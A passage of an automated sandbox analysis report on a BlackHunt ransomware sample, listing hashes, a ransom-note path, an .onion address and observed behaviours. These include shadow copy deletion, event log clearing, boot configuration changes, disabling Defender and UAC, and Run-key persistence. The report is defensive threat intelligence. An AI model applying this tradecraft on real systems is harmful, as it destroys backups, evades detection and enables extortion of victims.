Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 22:31
Static task
static1
Behavioral task
behavioral1
Sample
0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe
Resource
win10v2004-20231215-en
General
-
Target
0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe
-
Size
707KB
-
MD5
edcd84ef7afda21027ec983d65aa3ff3
-
SHA1
578fa6babcc5b8ca531006837cd639164a6e19de
-
SHA256
0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e
-
SHA512
7606c8cab0292fd1dc87f03c8ff30c0e33aadad66d0d73b73d84eea753024bc9ee03435ad4244230b990a60ab39d5ced532df9e5e9b4996cd782b8a4e1347511
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1M83vnh:6uaTmkZJ+naie5OTamgEoKxLW/fh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 8924 fsutil.exe 6876 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 8812 wevtutil.exe 920 wevtutil.exe 3044 wevtutil.exe 8356 wevtutil.exe 9168 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6672 bcdedit.exe 6596 bcdedit.exe 9088 bcdedit.exe 8948 bcdedit.exe -
Renames multiple (3387) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 6808 wbadmin.exe 9180 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\P: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\U: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\I: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\A: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\S: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\K: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\W: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\R: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\E: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\N: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\X: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\B: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Q: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\Y: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\O: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\H: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\T: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\V: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\M: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\G: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\L: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\J: 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-ae\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\#BlackHunt_ReadMe.hta 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-up.png 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\#BlackHunt_ReadMe.hta 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\he-il\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\dd_arrow_small.png 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\webkit.md 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\nb-no\AppStore_icon.svg 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\#BlackHunt_ReadMe.txt 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files\VideoLAN\VLC\plugins\control\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\PlayStore_icon.svg 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sk-sk\#BlackHunt_ReadMe.hta 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\server\Xusage.txt 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\#BlackHunt_ReadMe.txt 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\#BlackHunt_ReadMe.txt 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\#BlackHunt_ReadMe.txt 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\ui-strings.js 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files\7-Zip\descript.ion 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files\VideoLAN\VLC\locale\an\#BlackHunt_ReadMe.txt 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\#BlackHunt_ReadMe.hta 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#BlackHunt_ReadMe.txt 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\#BlackHunt_ReadMe.txt 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\ui-strings.js 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\scan_poster.jpg 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files\Java\jre-1.8\bin\server\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\AppStore_icon.svg 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\#BlackHunt_ReadMe.txt 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\#BlackHunt_ReadMe.hta 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\#BlackHunt_ReadMe.hta 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\freebxml.md 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\#BlackHunt_ReadMe.txt 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\tr-tr\ui-strings.js 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\#BlackHunt_ReadMe.txt 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\#BlackHunt_ReadMe.txt 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\root\#BlackHunt_ReadMe.hta 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\ui-strings.js 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\ui-strings.js 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main-selector.css 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\ui-strings.js 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\#BlackHunt_ReadMe.hta 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\#BlackHunt_Private.key 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\flags.png 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\#BlackHunt_ReadMe.txt 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\#BlackHunt_ReadMe.hta 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner.gif 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\da-dk\#BlackHunt_ReadMe.hta 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\main.css 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3272 7668 WerFault.exe 292 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4316 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 8756 vssadmin.exe 460 vssadmin.exe 1308 vssadmin.exe 4960 vssadmin.exe 5092 vssadmin.exe 6092 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 7628 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5620 PING.EXE -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe Token: SeRestorePrivilege 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe Token: SeBackupPrivilege 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe Token: SeTakeOwnershipPrivilege 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe Token: SeAuditPrivilege 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe Token: SeSecurityPrivilege 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe Token: SeIncBasePriorityPrivilege 996 0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe Token: SeBackupPrivilege 4224 vssvc.exe Token: SeRestorePrivilege 4224 vssvc.exe Token: SeAuditPrivilege 4224 vssvc.exe Token: SeBackupPrivilege 4352 wbengine.exe Token: 